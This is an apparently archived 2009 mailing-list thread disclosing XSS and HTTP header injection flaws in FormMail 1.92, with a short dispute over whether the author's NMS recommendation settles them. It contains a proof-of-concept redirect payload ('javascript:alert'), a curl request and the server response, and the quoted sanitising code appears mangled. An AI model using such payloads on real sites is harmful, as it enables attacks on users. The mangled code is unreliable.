Re: FormMail 1.92 Multiple Vulnerabilities

2009-05-13 Thread ascii 
David Cantrell wrote:
> which to me looks like he's already addressed the issue by recommending
> that you use NMS formmail if you care about the quality of the code and
> any bugs.

Dear David,

telling people to use a different software doesn't automatically fix
issues.

As we tested FormMail and want to warn people who deployed FormMail and
will deploy FormMail we posted an advisory for FormMail. Hope this open
your mind.

Bye,
ascii
ush.it

Re: FormMail 1.92 Multiple Vulnerabilities

2009-05-13 Thread David Cantrell 

ascii wrote:


FormMail 1.92 Multiple Vulnerabilities  ...


The author's own webpage about formmail mentions the NMS project at the 
bottom of the page, about which he says:


" While the free code found at my web site has not evolved much in
  recent years, the general programming practices and standards of CGI
  programs have. nms is an attempt by very active programmers in the
  Perl community to bring the *quality of code for these types of
  programs up to date and eliminate some of the bad programming
  practices and bugs* found in the existing Matt's Script Archive code.

" I would highly recommend downloading the nms versions if you wish to
  learn CGI programming. The code you find at Matt's Script Archive is
  not representative of how even I would code these days. *My interests
  and activies have moved on, however, and I just have not found the
  time to update all of my scripts*. One of the major reasons for this
  is that they work for many people. For this reason, I will continue to
  provide them to the public, but am also *pleased to make you aware of
  well-coded alternatives*. "

(my emphasis)

which to me looks like he's already addressed the issue by recommending 
that you use NMS formmail if you care about the quality of the code and 
any bugs.


--
David Cantrell
Outcome Technologies Ltd
BUPA House, 15-19 Bloomsbury Way, London WC1A 2BA
Registered in England, No: 3829851

FormMail 1.92 Multiple Vulnerabilities

2009-05-12 Thread ascii 
FormMail 1.92 Multiple Vulnerabilities

 Name  Multiple Vulnerabilities in FormMail
 Systems Affected  FormMail 1.92 and possibly earlier versions
 Severity  Medium
 Impact (CVSSv2)   Medium 4.3/10, vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)
 Vendorhttp://www.scriptarchive.com/formmail.html
 Advisory  http://www.ush.it/team/ush/hack-formmail_192/adv.txt
 Authors   Francesco "ascii" Ongaro (ascii AT ush DOT it)
   Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
   Antonio "s4tan" Parata (s4tan AT ush DOT it)
 Date  20090511

I. BACKGROUND

FormMail is a generic HTML form to e-mail gateway that parses the
results of any form and sends them to the specified users. This script
has many formatting and operational options, most of which can be
specified within each form, meaning you don't need programming knowledge
or multiple scripts for multiple forms. This also makes FormMail the
perfect system-wide solution for allowing users form-based user feedback
capabilities without the risks of allowing freedom of CGI access. There
are several downloading options available below and more information on
this script can be found in the Readme file. FormMail is quite possibily
the most used CGI program on the internet, having been downloaded over
2,000,000 times since 1997.

II. DESCRIPTION

Multiple Vulnerabilities exist in FormMail software.

III. ANALYSIS

Summary:

 A) Prelude to the vulnerabities
 B) Cross Site Scripting
 C) HTTP Response Header Injection
 D) HTTP Response Splitting

A) Prelude to the vulnerabities

What follows is the code used to validate the user input:

Line 283: $safeConfig array definition.

--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--

foreach $field (keys %Config) {
$safeConfig{$field} = &clean_html($Config{$field});
}

--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--

Line 518: definition of clean_html function, used to generate the
"$safeConfig" array from "$Config".

--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--

# This function will convert <, >, & and " to their HTML equivalents.
sub clean_html {
local $value = $_[0];
$value =~ s/\&/\&/g;
$value =~ s//\>/g;
$value =~ s/"/\"/g;
return $value;
}

--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--

These functions are not always applied to the user input and don't
protect against all the attack vectors (as URI or DOM XSS that can work
also if encoded), this is why various vulnerabilities exist.

B) Cross Site Scripting vulnerability

Line 293: the "redirect" variable is used to write the location header
value. Its value is not filtered so it's possible to perform both
HTTP Header Injection and an HTTP Response Splitting attacks.

Since Header Injection is one of the most versatile attack vectors we
could use it (like "downgrade it") to perform a Cross Site Scripting
attack but it would not represent a different vulnerability.

In this case we are already inside a "Location" response header and it's
possible to perform an XSS without splitting the response and using the
standard Apache page for the 302 Found HTTP status.

--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--

# If redirect option is used, print the redirectional location header.
if ($Config{'redirect'}) {
 print "Location: $safeConfig{'redirect'}\n\n";
}

--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--

XSS vulnerability example:

http://127.0.0.1/formmail.pl?recipient=evilal...@ush.it&subject=1&redire
ct=javascript:alert(%27USH%27);

Response:

$ curl -kis "http://127.0.0.1/formmail.pl?recipient=evilal...@ush.it&sub
ject=1&redirect=javascript:alert(%27USH%27);"

--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--

HTTP/1.1 302 Found
Date: Sat, 11 Apr 2009 14:12:11 GMT
Server: Apache
Location: javascript:alert('USH');
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1


302 Found

Found
The document has moved here.

Apache Server at 127.0.0.1 Port 80


--8<